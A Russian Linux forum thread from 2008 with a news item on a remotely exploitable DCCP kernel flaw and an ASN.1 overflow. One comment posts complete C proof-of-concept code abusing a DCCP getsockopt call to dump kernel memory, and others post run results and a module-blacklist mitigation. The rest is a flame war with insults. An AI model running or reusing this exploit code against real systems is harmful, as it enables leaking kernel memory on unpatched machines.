LINUX.ORG.RU

Критическая уязвимость в ядре Linux

 , , ,


0

0

В ядре Linux обнаружена критическая уязвимость, потенциально позволяющая удаленному злоумышленнику выполнить свой код в системе путем отправки специальным образом модифицированного пакета. Проблема вызвана отсутствием проверки валидности параметров пакета в коде подсистемы DCCP (Datagram Congestion Control Protocol).

Уязвимость подтверждена в версии 2.6.18, дополнительно имеются упоминания о наличии данной проблемы в ядрах с 2.6.15 по 2.6.22.

Обновление с исправлением уязвимости, на момент написания новости, было доступно только для Debian GNU/Linux, для Ubuntu обновление находится в процессе подготовки.

Также сообщается о том, что возможность переполнения буфера в коде декодирования ASN.1, используемого в подсистемах CIFS и SNMP NAT, может привести к выполнению кода злоумышленника. Данная проблема была исправлена в вышедших несколько дней назад обновлениях ядра 2.6.25.5 и 2.4.36.6.

>>> Источник (opennet.ru)

Ответ на: комментарий от jackill

#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/mman.h>
#include <linux/net.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[])
{
void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem == (void*)-1) {
printf("Alloc failed\n");
return -1;
}
/* SOCK_DCCP, IPPROTO_DCCP */
int s = socket(PF_INET, 6, 33);
if (s == -1) {
fprintf(stderr, "socket failure!\n");
return 1;
}
/* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
int len = BUFSIZE;
int x = getsockopt(s, 269, 11, mem, &len);

if (x == -1)
perror("SETSOCKOPT");
else
printf("SUCCESS\n");

write(1, mem, BUFSIZE);

return 0;
}

Sylvia ★★★★★
()
Ответ на: комментарий от anonymous

>все бы вопили какая винда дырявая и нет ей оправдания.

Несомненно, ведь там обновления один раз в месяц, а тут практически в течение дня или раньше.

jackill ★★★★★
()
Ответ на: комментарий от jackill

> Несомненно, ведь там обновления один раз в месяц, а тут практически в течение дня или раньше.

Обновление для одного известного дистрибутива вышло одновременно с объявлением бага ;)

mv ★★★★★
()
Ответ на: комментарий от JackYF

> Ну, собственно, и всё :) 

Размечтался, ага.

seva@mini:~/Temp$ lsmod | grep dccp | wc -l 
0 

seva@mini:~/Temp$ ./dccp_proof
SUCCESS

seva@mini:~/Temp$ lsmod | grep dccp
dccp_ccid2              7456  0
dccp_ipv4              21512  2
dccp                   61232  2 dccp_ccid2,dccp_ipv4

sv75 ★★★★★
()
Ответ на: комментарий от Sylvia

andrey@evilhorse ~ $ gcc -o vot_gavno dccp_expl.c
andrey@evilhorse ~ $ ./vot_gavno
socket failure!
andrey@evilhorse ~ $ uname -a
Linux evilhorse 2.6.25-squashfs #2 Sat May 3 13:24:55 EEST 2008 i686 Intel(R) Celeron(R) CPU 2.50GHz GenuineIntel GNU/Linux
andrey@evilhorse ~ $

а теперь обьясните мне, что такое DCCP и зачем оно нужно?

ЗЫ самоконфижные ядра рулят

generatorglukoff ★★
()
Ответ на: комментарий от tommy

>А им самим этого не надо. Как и линукс.

а это плохо. это отдает красноглазым быдло-фанатизмом и бздунством. я вот более 5 лет использую решения на базе и bsd и линя. потому и могу судить что к чему. и не бросаюсь фразами "бзда ненужна". так что мсье бревнище из глаза своего и лоровских бзуднов извольте достать, а потом притензировать

главное линух не нужен, а сюда претесь. как и вантузятники. чисто из садомазохизма? или ЧСВ повышать?

> Поорать только - на это и способны.

сходи погляди, там местный бздунишка zanswer уже отметился

наверняка и тут ниже тоже. сейчас почитаем

black7
()
Ответ на: комментарий от ZANSWER

>А, стандартная тема, все уже привыкли к дырявости ядра Linux, - это Вам не Rock Solid Solaris 10...*RSS10*

о. я был прав. тебе даунишко мало было высера на опеннете? тебе и тут надо облегчиться? этож насколько убога твоя жизнь что ты ходиш по форумам и линух ругаешь =) жаль что родители тебя не научили другим способам поднятия ЧСВ. займись лучше чем то креативным несчастный

black7
()
Ответ на: комментарий от generatorglukoff

ext@test:~$ sudo gcc -o /home/vot_gavno /home/dccc.c ext@test:~$ sudo chmod +x /home/vot_gavno ext@test:~$ /home/vot_gavno SETSOCKOPT: Protocol not available

anonymous
()
Ответ на: комментарий от ZANSWER

>но я за Sun Solaris 10, ИМХО понимающие люди, да поймут...*GOD*

да мы уже давно поняли что ты малолетний идиот верящий в серебрянную пулю. ничего, пойдешь работать, узнаешь что к чему =)

black7
()
Ответ на: комментарий от batter

>Я поражаюсь с того, какую панику народ устраивает изза исправленой уязвимости в тестовой версии ведра, касательно никому не нужного DCCP.

воюющие бздуны и вантузятники изрядно тупили и сливали в тредах за последние полугодие (солнцевские тоже ессно, но за малым их числом оно малозаметно). думается что пытаются хоть так компенсировать сие досадное для них положение

black7
()
Ответ на: комментарий от black7

5 лет - это не срок, так себе ,категория "администратор среднего уровня подготовки", не новичок конечно, но до уровня "гуру" еще всю жизнь ползти.

Sun-ch
()
Ответ на: комментарий от Sun-ch

>5 лет - это не срок, так себе ,категория "администратор среднего уровня подготовки", не новичок конечно, но до уровня "гуру" еще всю жизнь ползти.

Почему по себе судишь? Может ты и читать научился к 30-и годам только, а таблицу умножения до сих пор не асилил - ну, дык, не все ж такие...

Led ★★★☆☆
()
Ответ на: комментарий от Sun-ch

>5 лет - это не срок, так себе ,категория "администратор среднего уровня подготовки", не новичок конечно, но до уровня "гуру" еще всю жизнь ползти.

несогласен, 5 лет очень даже срок для красноглазого линуксойда не вылезающего из дома, консоли и ЛОРа

anonymous
()
Ответ на: комментарий от sv75

угу… надо блеклистить… (и зачем я этот dccp включал?)

vvdm ~ # vim /etc/modprobe.d/blacklist
blacklist dccp
blacklist dccp_ipv4
blacklist dccp_ccid2
:wq
vvdm ~ # update-modules
vvdm ~ # ./a.out
socket failure!

dmiceman ★★★★★
()

Ха-ха, пишите и дальше на Си, любители трахаться с переполнениями буфера.

anonymous
()
Ответ на: комментарий от anonymous

>Ха-ха, пишите и дальше на Си, любители трахаться с переполнением буфера

Никлаус, и ты тут!? Ахтунг парни, Вирт на форуме!!!

anonymous
()

Все, ребятушки, поставил я WindowsXP - вот теперь я себя чувствую в безопасности. К тому же Fx3 работатет и под Windows. Так зачем мне небезопасная ОС?

CtrlAltBs
()
Ответ на: комментарий от anonymous

> несогласен, 5 лет очень даже срок для красноглазого линуксойда не вылезающего из дома, консоли и ЛОРа

А что, за тунеядство и ассоциальное поведение опять сроки дают?

sv75 ★★★★★
()
Ответ на: комментарий от CtrlAltBs

самое главное, что ты ей ни во что не упёрся :)

Binary ★★★★★
()
Ответ на: комментарий от anonymous

Чему школьник может научиться на ЛОРе? Кричать "вендакопец", "резать вдоль" и BSD RIP?.

Sun-ch
()
Ответ на: комментарий от sv75

>> несогласен, 5 лет очень даже срок для красноглазого линуксойда не вылезающего из дома, консоли и ЛОРа

>А что, за тунеядство и ассоциальное поведение опять сроки дают?

+1

anonymous
()
Ответ на: комментарий от anonymous

Я вот только что поставил 3 сервис-пак на XP. Windus теперь не грузиться.

вот и настал виндекапец на отдельно взятом компьютере.

sergeyiv
()
Ответ на: комментарий от anonymous

>>Пэанер, теперь выставь ее голой жьопай в нет!! =))

Да пожалуйста, но у нее задний прохож висит :)

sergeyiv
()
Ответ на: комментарий от anonymous

о, приплюснутые прибежали. эксепшены в ядре - решают! глюки должны быть мощными и убойными.++

anonymous
()
Ответ на: комментарий от sergeyiv

>Я вот только что поставил 3 сервис-пак на XP. Windus теперь не грузиться.

>вот и настал виндекапец на отдельно взятом компьютере.

не только винде, но и грамматике, и не только на компьютере =)

anonymous
()
Ответ на: комментарий от anonymous

>о, приплюснутые прибежали. эксепшены в ядре - решают! глюки должны быть мощными и убойными.++

LOL, в плюсах разве нет проблемы с переполнением буфера? ))) Тот анонимус явно на паскаль или его подобных намекал - это очевидно, как уже и то, что ты красноглазый плюсобоф ))))))))

anonymous
()
Ответ на: комментарий от CtrlAltBs

> Все, ребятушки, поставил я WindowsXP - вот теперь я себя чувствую в безопасности. К тому же Fx3 работатет и под Windows.

Куда теперь будещь девать ненужную oem-глисту?

> Так зачем мне небезопасная ОС?

Это тебя надо спросить, зачем ты её установил.

anonymous
()
Ответ на: комментарий от anonymous

> вот если бы на винде нашли такое, все бы вопили какая винда дырявая и нет ей оправдания. а тут с точностью до наоборот.

В винде нет критических уязвимостей, там все уязвимости классические.

anonymous
()
Ответ на: комментарий от SilentLexx

>По факту: Если код писал человек

даёшь огромных человекоподобных роботов, которые будут писать безошибочный код! ну и охранять границу заодно...

pronvit
()
Ответ на: комментарий от anonymous

Мла, всё тот же унылый флейм на те же доставшие всех темы. Пора двигаться дальше, друзья мои.

anonymous
()
Ответ на: комментарий от anonymous

> Куда теперь будещь девать ненужную oem-глисту?

Висту я только у знакомых видел, ибо года два как на Ubuntu был.

CtrlAltBs
()

Дыры есть везде. Не повод столько вонять. Это тем кто ту пишет что линух превращается в винду и т.д. Погуглите , по разным ос, везде баги, багфиксы и снова баги. Вполне нормальная ситуация.

anonymous
()
Ответ на: комментарий от black7

Ухаха... свет из Ваших алых глаз меня повергает в ужас, что ещё расскажете обо мне хорошего, жду с нетерпением, жалею только о том, что Вы очередной неудачник, который неспособен не на что, кроме оскарблений, а жаль...:-D:-D:-D

ZANSWER
()
Ответ на: комментарий от black7

Ух... Вы случаем не тот самый анонимный аналитик с интерфейсом в астрал, о котором так много говорят на ЛОР-е??=-O Жду новых открытий, о себе, из Ваших уст, это весьма забавно, наблюдать, как Вас разрывает от злости, что Вы беспомощны что-то изменить...*CRAZY*

ZANSWER
()
Ответ на: комментарий от anonymous

>Ядро на Паскале

что вас пугает?

>причем интерпретируемом...

это тут причем?!

>ВЕЩЕСТВА!

ясно, вопросов больше не имею :)

anonymous
()
Ответ на: комментарий от CtrlAltBs

> Висту я только у знакомых видел

Даже не удосужился её запустить прежде чем стал ставить свинью?

> ибо года два как на Ubuntu был.

Да вижу я в твоих темах как ты был на убунту. И ogg у тебя плеер не держал и папочку с примонтироваными media ты найти не мог.

anonymous
()
Ответ на: комментарий от anonymous

ЛУЧИ ПАСКАЛЯ!111 РАСЧЕХЛЯЕМ ФРИПАСКАЛИ!! ОПТИМИЗ НА ПОЛНУЭ МОЩНОСТЬ!!!11111 ПЫЩЩЩЩЩЩЩЩЩЩЩЩЩЩЩЩЬ ПЫЩ ПЫЩ ПЫЩЩЩЩЩЩ!!!!

anonymous
()
Ответ на: комментарий от ZANSWER

> Вы случаем не тот самый анонимный аналитик с интерфейсом в астрал, о котором так много говорят на ЛОР-е?

Учитывая феерический анализ в виде:

> Вас разрывает от злости > Вы беспомощны что-то изменить

Я вам запишу в диагноз нарушение самоидентификации после деанонимизации.

anonymous
()

[gforgx@ffap ~]$ modprobe -l *dccp*

/lib/modules/2.6.24-ice/kernel/net/netfilter/xt_dccp.ko

Я так понимаю, это не то )

[gforgx@ffap ~]$ ./exploit

socket failure!

[gforgx@ffap ~]$ uname -a

Linux ffap 2.6.24-ice #1 SMP PREEMPT Mon Apr 21 21:25:06 ALMT 2008 i686 Intel(R) Pentium(R) 4 CPU 2.66GHz GenuineIntel GNU/Linux

GFORGX ★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.